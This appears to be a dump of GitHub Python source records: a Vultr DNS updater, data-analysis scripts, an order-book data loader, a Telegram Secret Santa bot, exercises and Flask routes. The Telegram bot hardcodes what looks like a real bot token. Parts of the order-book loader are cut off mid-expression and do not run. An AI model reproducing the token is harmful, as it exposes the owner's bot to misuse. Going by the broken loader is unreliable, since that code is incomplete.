No records have been updated.\")\n\tsys.exit(0)\n\nchanges = sorted(set(\n\t(record[\"data\"], record[\"new_ip\"])\n\tfor record in records_to_change\n))\n\nprint(\"IP has changed since last checking.\")\nfor old_ip, new_ip in changes:\n\tprint(f\"Old IP on Vultr: {old_ip}, current server IP: {new_ip}\")\n\n# Update the records in Vultr with the new IP address\nfor record in records_to_change:\n\tpayload = {\"data\": record[\"new_ip\"]}\n\tresponse = requests.patch(\"https://api.vultr.com/v2/domains/{}/records/{}\".format(domain, record[\"id\"]), json=payload, headers={\"Authorization\": \"Bearer \" + api_key})\n\tname = record[\"name\"]\n\tif name == \"\":\n\t\tname = \"@\"\n\tif \"error\" in response.text:\n\t\tprint(\"Error returned from Vultr API:\")\n\t\tprint(response.text)\n\telse:\n\t\tprint(f\"Changed {name}/{record['type']} ({record['id']}) to {record['new_ip']} in {domain}\")\n","repo_name":"andyjsmith/Vultr-Dynamic-DNS","sub_path":"ddns.py","file_name":"ddns.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"}
+{"seq_id":"33998696076","text":"# Fiona O'Riordan 28 March 2019 \n# Project Iris Data Set\n# Create histograms for all 4 variables in the data set distinctly showing an approximate frequency distribution of each of the quantitative variables in the set.\n# Adapted from:\n# https://machinelearningmastery.com/machine-learning-in-python-step-by-step/ [18]\n# https://www.youtube.com/watch?v=r75BPh1uk38 [19]\n# https://stackoverflow.com/a/19603918/11250489 [20]\n# https://stackoverflow.com/questions/37970424/what-is-the-difference-between-drawing-plots-using-plot-axes-or-figure-in-matpl/37970713 [21]\n# import the pandas library in order to use the read_csv function below and rename as pd \nimport pandas as pd\n# import the matplotlib library class pyplot in order to use the show function below and rename as plt\nimport matplotlib.pyplot as plt\n\n\n# url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\" \nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class'] \n# load the data by reading in the iris csv\niris = pd.read_csv(\"iris.csv\", names=names)\n\n# create a histogram for all 4 variables \n# the default number of bins =10 but set the number of bins = 20 so that we can see the data grouped into smaller ranges.\n# plt.hist(bins=20)\n\n# creating the histograms for all 4 variables distinctly so that I can label \n# and color each chart distinctly\n\n# create a named figure to hold the four histograms\nplt.figure('Histogram1')\nplt.subplot(2,2,1)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('petal-width')\n\n\nplt.subplot(2,2,2)\niris['petal-length'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('petal-length')\n\nplt.subplot(2,2,3)\niris['sepal-length'].hist(bins=20)\n# create x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('sepal-length')\n\nplt.subplot(2,2,4)\niris['sepal-width'].hist(bins=20)\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('sepal-width')\n\n\n# display the figure containing all four histograms\nplt.show()\n\n","repo_name":"fionaoriordan/52445_19_iris","sub_path":"histiris.py","file_name":"histiris.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4869649203","text":"# encoding: utf-8\n# file: data_util.py\n# author: shawn233\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport time\nimport numpy as np\n\n'''\nFunctions:\n1. divide data into training set, dev set and test set (7:1:2)\n2. provide function `next_batch()`, returns the next batch in one epoch;\n provide function `reset_batch()`, to reset the batch for a new epoch.\n\nUsage tips:\n1. Assume memory is large enough to store all data, will use `readlines()` to read data;\n'''\n\n'''\nTODO:\n1. divide data based on date; (done)\n2. add time stamp to feature; (done)\n3. delete midprice for feature; (done)\n4. clean data to include only 3-sec intervals; (done)\n5. remove time stamp intervals from features; (done)\n6. attemp: remove volume from features; success? (seens not)\n7. fine processing of data_matrix to get more train data: \n eliminate intervals less than 3 secs; (done) (may need to discard)\n8. correct the mistake of crossing a day when calculating mean mid price;\n9. correct the mistake of deleting time stamps for calculating mean mid price;\n\n'''\n\nTRAIN_INPUTS_FILENAME = 'train_inputs.npy'\nTRAIN_LABELS_FILENAME = 'train_labels.npy'\nDEV_INPUTS_FILENAME = 'dev_inputs.npy'\nDEV_LABELS_FILENAME = 'dev_labels.npy'\nTEST_INPUTS_FILENAME = 'test_inputs.npy'\nTEST_LABELS_FILENAME = 'test_labels.npy'\n\nTRAIN_MEANS_FILENAME = 'train_means.npy'\nTRAIN_STDDEVS_FILENAME = 'train_stddevs.npy'\nDEV_MEANS_FILENAME = 'dev_means.npy'\nDEV_STDDEVS_FILENAME = 'dev_stddevs.npy'\nTEST_MEANS_FILENAME = 'test_means.npy'\nTEST_STDDEVS_FILENAME = 'test_stddevs.npy'\n\nTRAIN_DATA_FILENAME = 'train_data.csv'\nTEST_DATA_FILENAME = 'test_data.csv'\n\nTRAIN_DATA_PRE_PROCESSED_FILENAME = 'train_preprocessed.npy'\nTEST_DATA_PRE_PROCESSED_FILENAME = 'test_preprocessed.npy'\nPRE_PROCESS_RECORD_FILENAME = 'preprocess.txt'\n\n\ndef _save_data (inputs, labels, full_path_dir, inputs_name, label_name):\n '''\n Save data into full_path_dir\n \n used in function `divide_data()`\n '''\n\n #arr_inputs = np.array(inputs, dtype=np.float32)\n #arr_labels = np.array(labels, dtype=np.float32)\n\n np.save(os.path.join (full_path_dir, inputs_name), inputs)\n np.save(os.path.join (full_path_dir, label_name), labels)\n\n\ndef _read_data (full_path_dir, inputs_name, labels_name):\n '''\n Read data from full_path_dir\n \n Returns:\n inputs, labels\n '''\n\n return np.load (os.path.join (full_path_dir, inputs_name)),\\\n np.load (os.path.join (full_path_dir, labels_name))\n\n\nclass OrderBook:\n\n '''\n Order book class, designed mainly for data input\n '''\n\n def __init__ (self, batch_size, data_dir, \n num_inputs=10,\\\n num_labels=20,\\\n data_regenerate_flag=False):\n '''\n Initialization, open the files and set the arguments\n\n Args:\n - batch_size: int;\n - data_dir: string, directory of the data\n - data_regenerate_flag: bool, True if re-process data, False if use stored data\n '''\n\n self._batch_size = batch_size\n self.batch_ind = 0\n self._data_dir = data_dir\n self._num_inputs = num_inputs\n self._num_labels = num_labels\n self.num_features = None # will be later set after processing data\n\n # vars for training set\n self.train_inputs = None\n self.train_labels = None\n self.train_means = None\n self.train_stddevs = None\n\n # vars for dev set\n self.dev_inputs = None\n self.dev_labels = None\n self.dev_means = None\n self.dev_stddevs = None\n\n # vars for test set\n self.test_inputs = None\n self.test_labels = None\n self.test_means = None\n self.test_stddevs = 
None\n\n # var for recording index in data matrix\n self.index = {\n 'Date':1,\n 'Time':2,\n 'MidPrice':3,\n 'LastPrice':4,\n 'Volume':5,\n 'BidPrice1':6,\n 'BidVolume1':7,\n 'AskPrice1':8,\n 'AskVolume1':9,\n 'TimeStamp':10\n }\n \n if data_regenerate_flag or not os.path.exists (os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME)):\n self.__data_process_procedure()\n\n self.train_inputs, self.train_labels, self.train_means, self.train_stddevs = \\\n self.__load_inputs_and_labels(os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_LABELS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_STDDEVS_FILENAME))\n\n self.num_features = self.train_inputs.shape[2]\n\n\n\n\n @property\n def batch_size (self):\n return self._batch_size\n\n \n @batch_size.setter\n def batch_size (self, value):\n self._batch_size = value\n\n \n @property\n def data_dir (self):\n return self._data_dir\n\n\n @data_dir.setter\n def data_dir (self, value):\n self._data_dir = value\n\n\n @property\n def num_samples (self):\n '''\n Number of training samples\n '''\n\n return self.train_inputs.shape[0]\n\n \n @property\n def num_batches (self):\n '''\n Maximum number of batches that can be provided in one epoch\n '''\n return int (self.num_samples / self.batch_size)\n\n\n\n def __data_process_procedure (self):\n '''\n Define the procedure of data processing\n\n Args:\n None\n\n Returns:\n None\n '''\n\n # train data\n print (\"Start processing training data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TRAIN_DATA_FILENAME))\n print (\"Done\")\n print (\"Dividing data matrix into days...\")\n day_matrix_list = \\\n self.__divide_by_day (data_matrix)\n print (\"Done\")\n print (\"Generating samples...\")\n sample_inputs_list, sample_labels_list, base_index = \\\n self.__generate_samples (day_matrix_list)\n print (\"Done\")\n print (\"Normalizing samples...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (sample_inputs_list, sample_labels_list, base_index)\n print(\"Done\")\n print(\"Remove lastPrice feature...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__remove_lastPrice(sample_inputs_list, sample_labels_list, base_index)\n print (\"Done\")\n print (\"Saving samples...\")\n train_inputs_path, train_labels_path, train_means_path, train_stddevs_path = \\\n self.__store_inputs_and_labels (sample_inputs_list, sample_labels_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Processing training data completed\")\n\n # test data\n print (\"Start procssing test data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TEST_DATA_FILENAME))\n print (\"Done\")\n print (\"Parsing test data...\")\n test_inputs_list, base_index = \\\n self.__parse_test_data (data_matrix)\n print (\"Done\")\n print (\"Normalizing test inputs...\")\n meaningless_test_labels_list = np.zeros (shape=[len(test_inputs_list)]) # just fit the arguments of __sample_normalization\n test_inputs_list, meaningless_test_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (test_inputs_list, meaningless_test_labels_list, base_index)\n print (\"Done\")\n print (\"Saving test inputs...\")\n self.__store_test_inputs (test_inputs_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Procssing test data completed\")\n\n\n\n 
def __read_data_matrix(self, in_filename):\n '''\n Read the train data matrix\n\n Args:\n - in_filename: string, input file name;\n\n Returns:\n - data_matrix: 2-d np matrix, dtype= refer4:\n continue # remove the data not in transaction time\n line.append (timeStamp)\n data_matrix.append (line)\n \n in_f.close()\n\n data_matrix = np.asarray (data_matrix)\n print ('data matrix shape:', data_matrix.shape)\n \n return data_matrix\n\n\n\n def __divide_by_day (self, input_matrix):\n '''\n Divide train data by day and morning/afternoon\n\n Args:\n - input_matrix: 2-d np matrix, dtype= 1e-4:\n if show_error:\n print ('[validate error] input matrix timestamp error:')\n print (input_matrix)\n return False\n\n for i in range (self._num_labels):\n if np.abs (midprice_matrix[i, 0]) > 3.1:\n if show_error:\n print ('[validate error] mid price matrix crosses a day')\n print (midprice_matrix)\n return False\n\n return True\n\n\n\n def __divide_data (self, in_filename):\n '''\n [Discard]\n Divide data into training set, and dev set (9:1), **after pre-processing**\n \n Args:\n - in_filename: string, full path of pre-processed data file\n \n Returns:\n - None\n\n (Implementation specified for projects, can not be reused)\n '''\n \n input_size = 10\n output_avg_len = 20\n\n data_matrix = np.load (in_filename)\n \n # 1. generate inputs and lables from data_matrix\n inputs = []\n labels = []\n\n total_cnt = 0\n accepted_cnt = 0\n\n num_inputs = data_matrix.shape[0] - (input_size + output_avg_len) + 1\n\n # mean and stddev prepared for later calculation\n pre_mean_labels = self.pre_mean[1]\n pre_stddev_labels = self.pre_stddev[1]\n \n for i in range (num_inputs):\n # delete midprice from input features \n input_matrix = np.hstack ((data_matrix[i:(i+input_size), :1], \n data_matrix[i:(i+input_size), 2:]))\n total_cnt += 1\n \n input_matrix[0, 0] = 3.0\n midprice_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, 1:2]\n midprice_timestamp_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, :1]\n if (self.__validate_input (input_matrix, midprice_timestamp_matrix)):\n accepted_cnt += 1\n inputs.append (input_matrix[:, 1:])\n label_val = np.mean (midprice_matrix)\n labels.append ((label_val-pre_mean_labels)/pre_stddev_labels)\n\n assert len(inputs) == len(labels)\n print ('accepted train samples:', accepted_cnt, '/', total_cnt)\n\n # 2. divide train data and dev data\n indices = np.asarray(list (range(len(inputs))))\n np.random.shuffle (indices)\n\n train_data_bound = int (np.ceil(len(inputs) * 0.9))\n dev_data_bound = len (inputs)\n\n train_inputs = []\n train_labels = []\n dev_inputs = []\n dev_labels = []\n\n for i in indices[:train_data_bound]:\n train_inputs.append (inputs[i])\n train_labels.append (labels[i])\n\n for i in indices[train_data_bound:]:\n dev_inputs.append (inputs[i])\n dev_labels.append (labels[i])\n\n train_inputs = np.asarray (train_inputs)\n train_labels = np.asarray (train_labels)\n dev_inputs = np.asarray (dev_inputs)\n dev_labels = np.asarray (dev_labels)\n\n # 3. 
save train and dev data\n full_path_dir = os.path.dirname (in_filename)\n _save_data (train_inputs, train_labels, full_path_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n _save_data (dev_inputs, dev_labels, full_path_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n #_save_data (test_inputs, test_labels, full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n \n def __read_test_data (self, in_filename):\n '''\n [Discard]\n Read and save test data set after pre-process test data\n\n Args:\n - in_filename: string, path of pre-processed test data.\n\n Returns:\n - None\n '''\n \n input_size = 10\n data_matrix = np.load (in_filename)\n\n num_inputs = data_matrix.shape[0] // input_size\n assert num_inputs * input_size == data_matrix.shape[0]\n\n inputs = []\n for i in range (num_inputs):\n input_matrix = np.hstack ((data_matrix[i*input_size:(i+1)*input_size, :1],\n data_matrix[i*input_size:(i+1)*input_size, 2:]))\n input_matrix[0, 0] = 3.0\n #assert self.__validate_input (input_matrix, show_error=True)\n inputs.append (input_matrix[:, 1:])\n\n full_path_dir = os.path.dirname (in_filename)\n _save_data (inputs, [], full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n\n def next_batch (self):\n '''\n Get the next batch of the training set\n\n Returns:\n train_inputs_batch: a padded input batch, batch_size x max_len x n_input\n train_labels_batch: a padded label batch, batch_size x 1\n '''\n\n if self.train_inputs is None:\n self.train_inputs, self.train_labels = _read_data (self.data_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n\n assert self.batch_ind + self.batch_size <= len (self.train_inputs)\n\n train_batch_inputs = self.train_inputs[self.batch_ind: self.batch_ind + self.batch_size]\n train_batch_labels = self.train_labels[self.batch_ind: self.batch_ind + self.batch_size]\n\n self.batch_ind += self.batch_size\n\n return train_batch_inputs, train_batch_labels\n\n\n def reset_batch (self):\n '''\n Reset self.batch_ind for a new epoch\n '''\n\n self.batch_ind = 0\n\n\n def dev_set (self): \n '''\n Get the padded dev inputs and labels\n\n Returns:\n dev_inputs: a list of inputs (lists);\n dev_lables: a list of labels\n '''\n\n if self.dev_inputs is None:\n self.dev_inputs, self.dev_labels = _read_data (self.data_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n\n return self.dev_inputs, self.dev_labels\n\n\n def test_set (self):\n '''\n Get the test inputs, means and stddevs\n\n Returns:\n test_inputs: 3-d np array;\n test_means: 1-d np array;\n test_stddevs: 1-d np array;\n '''\n\n if self.test_inputs is None:\n self.test_inputs, self.test_means, self.test_stddevs = \\\n self.__load_test_inputs (os.path.join (self._data_dir, TEST_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TEST_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TEST_STDDEVS_FILENAME))\n\n return self.test_inputs, self.test_means, self.test_stddevs\n\n\n\n\n\nif __name__ == \"__main__\":\n BASE_DIR = os.path.dirname (os.path.abspath(sys.argv[0]))\n #INPUT_FILENAME = 'train1.csv'\n PROJECT_DIR = os.path.dirname (BASE_DIR)\n DATA_DIR = os.path.join (PROJECT_DIR, 'data')\n\n order_book = OrderBook (2, DATA_DIR, data_regenerate_flag=True)\n \n print (order_book.num_batches)\n for i in range (10):\n inputs, labels, mean, stddev = order_book.next_batch_with_mean_and_stddev ()\n print (inputs)\n print (labels)\n print (mean)\n print (stddev)\n input ()\n\n #test_inputs, _ = order_book.test_set()\n #print 
(test_inputs.shape)\n\n","repo_name":"lunaryan/my_AI","sub_path":"data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":29585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17396274358","text":"# - *- coding: utf- 8 - *-\nimport copy\nimport logging\nimport random\nfrom functools import wraps\n\nimport telegram\nfrom telegram.ext import Updater, CommandHandler\nfrom telegram.error import (\n TelegramError,\n Unauthorized,\n BadRequest,\n TimedOut,\n ChatMigrated,\n NetworkError,\n)\n\n\nrules_text = (\n \"Правила Секретного Санты: \\n\"\n + \"1. Санта Секретный - никому не говори, кто тебе выпал!\\n\"\n + \"2. Подарок должен быть не дороже 200 грн.\\n\"\n + \"3. Спрячь свой подарок в красный мешок (найдешь его под елкой).\\n\"\n + \"4. Санта придет к тебе только после боя курантов.\\n\"\n)\n\n\ndef send_typing_action(func):\n \"\"\"Sends typing action while processing func command.\"\"\"\n\n @wraps(func)\n def command_func(*args, **kwargs):\n bot, update = args\n bot.send_chat_action(\n chat_id=update.effective_message.chat_id, action=telegram.ChatAction.TYPING\n )\n return func(bot, update, **kwargs)\n\n return command_func\n\n\n@send_typing_action\ndef start(bot, update):\n if update.message.chat.type == \"group\":\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Я тайный помощник Санты. Для того , чтобы магия произошла, \"\n \"кликни сюда -> @\" + str(bot.get_me()[\"username\"]) + \" и нажми старт!\",\n )\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n else:\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Круто, мы не забудем о тебе. Переходи в общий чат и регистрируйся.\",\n )\n\n\n@send_typing_action\ndef rules(bot, update):\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n\npeople = []\npairs = dict()\n\n\n@send_typing_action\ndef register(bot, update):\n u = User(\n update.effective_user.id,\n update.effective_user.username,\n update.effective_user.first_name,\n update.effective_user.last_name,\n )\n if u not in people:\n # print(update.effective_user.id)\n print(update.effective_user.username)\n # print(update.effective_user.first_name)\n # print(update.effective_user.last_name)\n people.append(u)\n bot.send_message(\n update.effective_user.id, \"Ты добавлен в список Секретного Санты!\"\n )\n else:\n bot.send_message(\n update.effective_user.id,\n \"Ты уже добавлен в мой список. 
Жди когда волшебство произойдет\",\n )\n\n\ndef info(bot, update):\n for p in people:\n print(p.username)\n print(p.last_name)\n\n\nclass User:\n def __init__(self, user_id, username, first_name, last_name):\n self.user_id = user_id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n\n def __hash__(self):\n return hash(self.user_id)\n\n def __eq__(self, other):\n return self.user_id == other.user_id\n\n\ndef secret_santa(names):\n my_list = names\n choose = copy.copy(my_list)\n result = []\n for i in my_list:\n names = copy.copy(my_list)\n names.pop(names.index(i))\n chosen = random.choice(list(set(choose) & (set(names))))\n result.append((i, chosen))\n choose.pop(choose.index(chosen))\n return result\n\n\ndef magic(bot, update):\n # try:\n if update.effective_user.username == \"yarikpavlin\":\n print(\"Length \" + str(len(people)))\n if len(people) == bot.get_chat_members_count(update.message.chat.id) - 1:\n for i in secret_santa(people):\n # i - array with pari of receiver and provider\n # i[0] - user which is going to make a present\n # i[1] - user which is going to take a present\n # If receiver has username, show his username\n if i[1].username is not None:\n print(i[1])\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для @\" + str(i[1].username),\n )\n # Else, show just first name\n else:\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для \" + str(i[1].first_name),\n )\n\n print(\"Gifts almost here\")\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Супер! Каждый получил своего тайного санту! Остаеться ждать Нового Года!\",\n )\n else:\n print(\"Some later, now it's \")\n bot.send_message(\n update.effective_user.id, \"Some later, now it's \" + str(len(people))\n )\n else:\n print(\"You are not Santa's helper, I'm sorry \")\n bot.send_message(\n update.effective_user.id, \"You are not Santa's helper, I'm sorry \"\n )\n\n\n# except Exception as inst:\n# print(inst)\n# print(people)\n# print(secret_santa(people))\n\n\ndef error_callback(bot, update, error):\n try:\n raise error\n except Unauthorized:\n print(error)\n # remove update.message.chat_id from conversation list\n except BadRequest:\n print(error)\n # handle malformed requests - read more below!\n except TimedOut:\n print(error)\n # handle slow connection problems\n except NetworkError:\n print(error)\n # handle other connection problems\n except ChatMigrated as e:\n print(error)\n # the chat_id of a group has changed, use e.new_chat_id instead\n except TelegramError:\n print(error)\n # handle all other telegram related errors\n\n\ndef main():\n logging.basicConfig(\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n level=logging.INFO,\n )\n logger = logging.getLogger(__name__)\n # Create Updater object and attach dispatcher to it\n updater = Updater(token=\"673782777:AAEmRHnnJVe5npGALLSUquytHaRlQ-TfPh8\")\n dispatcher = updater.dispatcher\n print(\"Bot started\")\n\n # Add command handler to dispatcher\n start_handler = CommandHandler(\"start\", start)\n register_handler = CommandHandler(\"register\", register)\n info_handler = CommandHandler(\"info\", info)\n rules_handler = CommandHandler(\"rules\", rules)\n magic_handler = CommandHandler(\"magic\", magic)\n\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(register_handler)\n dispatcher.add_handler(info_handler)\n dispatcher.add_handler(rules_handler)\n dispatcher.add_handler(magic_handler)\n dispatcher.add_error_handler(error_callback)\n\n # 
Start the bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yarikpavlin/secret-santa-prototype","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31179775138","text":"n = int(input())\r\n\r\narr = list(map(int, input().split()))\r\n\r\narr = [-1] + arr\r\n\r\nm = int(input())\r\n\r\nstu = []\r\n\r\n\r\ndef male(num):\r\n for i in range(1, n+1):\r\n if i % num == 0:\r\n if arr[i] == 1:\r\n arr[i] = 0\r\n else:\r\n arr[i] = 1\r\n\r\n\r\ndef female(num):\r\n if arr[num] == 1:\r\n arr[num] = 0\r\n else:\r\n arr[num] = 1\r\n\r\n left = num - 1\r\n right = num + 1\r\n\r\n while left > 0 and right <= n:\r\n if arr[left] == arr[right]:\r\n if arr[left] == 1:\r\n arr[left] = 0\r\n arr[right] = 0\r\n else:\r\n arr[left] = 1\r\n arr[right] = 1\r\n\r\n left -= 1\r\n right += 1\r\n else:\r\n break\r\n\r\n\r\nfor i in range(m):\r\n sex, num = map(int, input().split())\r\n\r\n if sex == 1:\r\n male(num)\r\n else:\r\n female(num)\r\n\r\n\r\nfor i in range(1, len(arr)):\r\n if i > 0 and i % 20 == 0:\r\n print(arr[i])\r\n else:\r\n print(arr[i], end=' ')\r\n","repo_name":"junheeLee96/algorithm","sub_path":"백준/Silver/1244. 스위치 켜고 끄기/스위치 켜고 끄기.py","file_name":"스위치 켜고 끄기.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"38584344458","text":"#Format input names, given as strings, as follows\r\n#Sample\r\n#Input Output\r\n#Aryadev Aryadev\r\n#Rajsekhar Basu R. Basu\r\n#Nabaneeta Dev Sen N. D. Sen\r\n#Dawlat Wazir Bahram Khan D. W. B. Khan\r\n\r\n\r\n\r\nstr=input(\"Enter your full name:\")\r\nli=str.split() #split function is use to convert a string into a list\r\nn=len(li)-1 #len function is use to find thelength of the list\r\nfor i in range(0,n):\r\n word=li[i] #in the word variable we store the element of the list\r\n print(word[0:1],end=\"\") #using string slicing we print the first letter of the each element of the list without the last element\r\n print(\". \",end=\"\")\r\nprint(li[n]) #print the last element of the list\r\n\r\n#set1\r\n#Enter your full name:Rajsekhar Basu\r\n#R. Basu\r\n\r\n#set2\r\n#Enter your full name:Dawlat Wazir Bahram Khan\r\n#D. W. B. Khan\r\n\r\n","repo_name":"Avishikta2312/Python-Assignment","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74843295209","text":"import json\n\nfrom flask import Blueprint, request\nfrom controllers import main_controller\n\npage = Blueprint('main', __name__)\n\n\n@page.route('/', methods=['GET'])\ndef index():\n    return main_controller.main_get()\n\n\n@page.route('/get_data/', methods=['GET'], defaults={'uid': None})\n@page.route('/get_data/<uid>', methods=['GET'])\ndef get_data(uid):\n\n    if uid is not None:\n        with open(f'static/output/audio_{uid}.json', 'r') as f:\n            data = json.load(f)\n        main_controller.remove_files(uid, is_output=True)\n        return data\n\n    main_controller.remove_files(uid, is_output=True)\n\n    return []\n\n\n@page.route('/example/', methods=['GET'])\ndef example_get():\n    return main_controller.example_get()\n\n\n@page.route('/model', methods=['POST'])\ndef model_post():\n    data = request.get_json()\n\n    keys = ['audio', 'sample_rate']\n\n    for key in keys:\n        if key not in data:\n            return {'status': 'error', 'message': f'{key} not in request'}\n\n    return main_controller.model_post(data['audio'], data['sample_rate'])\n","repo_name":"Berkay-23/diarizationAPI","sub_path":"routers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19923483584","text":"#Calculando o preço da viagem para 0.50 até 200km se passar disso 0.45\n\nnum = int(input('Digite a distância: '))\nif num <= 200:\n distancia = num * 0.50\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia))\nelse:\n distancia2 = num * 0.45\n print('Nessa distância, ficará por: R$ {:.2f}'.format(distancia2))\n\n\n\n#Da pra fazer o IF/ELSE assim também: \n# num=distancia*0.50 if distancia <= 200 else distancia * 0.45 \n#gostei nao mas é isso ai gabriel do futuro, ta anotado.\n","repo_name":"gaxque/Codando-JR","sub_path":"Calcular-KM.py","file_name":"Calcular-KM.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"35995819329","text":"\"\"\"empty message\n\nRevision ID: bcf853c67790\nRevises: f30cc5d13b95\nCreate Date: 2021-08-03 19:26:35.440576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bcf853c67790'\ndown_revision = 'f30cc5d13b95'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('districts_name_key', 'districts', type_='unique')\n op.add_column('judgments', sa.Column(\n 'court_order_number', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('judgments', 'court_order_number')\n op.create_unique_constraint('districts_name_key', 'districts', ['name'])\n # ### end Alembic commands ###\n","repo_name":"red-door-collective/eviction-tracker","sub_path":"migrations/versions/bcf853c67790_.py","file_name":"bcf853c67790_.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"}
+{"seq_id":"27201657882","text":"import pytest\nfrom src.createcompendia.geneprotein import build_compendium\nimport os\n\ndef test_gp():\n here=os.path.abspath(os.path.dirname(__file__))\n gene_compendium = os.path.join(here,'testdata','gptest_Gene.txt')\n protein_compendium = os.path.join(here,'testdata','gptest_Protein.txt')\n geneprotein_concord = os.path.join(here,'testdata','gp_UniProtNCBI.txt')\n outfile = os.path.join(here,'testdata','gp_output.txt')\n build_compendium(gene_compendium, protein_compendium, geneprotein_concord, outfile)\n with open(outfile,'r') as inf:\n x = inf.read()\n assert len(x) > 0\n print(x)\n","repo_name":"TranslatorSRI/Babel","sub_path":"tests/test_geneproteiny.py","file_name":"test_geneproteiny.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"10060240818","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\n#opening the file\n\ndf1 = pd.read_excel('India_Imports_2011-12_And_2012-13.xls')\t#reading import file\n\ndf2 = pd.read_excel('India_Exports_2011-12_And_2012-13.xls')\t#reading export file\n\nwriter=open('table.tex','w')\n\n#top five import and export destination by total import and export (based on value)\n\n\nop1=df1.groupby('Country').agg({'Value-INR-2011-12':'sum'})\t\t#grouping sum of values of ech country\n\nop2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\n\nop1=op1.reset_index()\nop2=op2.reset_index()\n\nop1=op1.nlargest(5, 'Value-INR-2011-12' )\t\t#extraction top 5 values from the results\nop2=op2.nlargest(5, 'Value-INR-2011-12' )\n\n\n\n#for import\ntotal=df1['Value-INR-2011-12'].sum()\nsum1=op1['Value-INR-2011-12'].sum()\n\nother=total-sum1\t\t\t\t#calculating sum of other countries\nop1.loc[5]=['Others',other]\n\nslices=op1['Value-INR-2011-12']\n\ncountry=op1['Country']\n\nplt.pie(slices, labels=country)\n\n\nplt.title('Top 5 Country pie chart for import of year 2011-12')\n\n\nplt.savefig('image1.jpg', 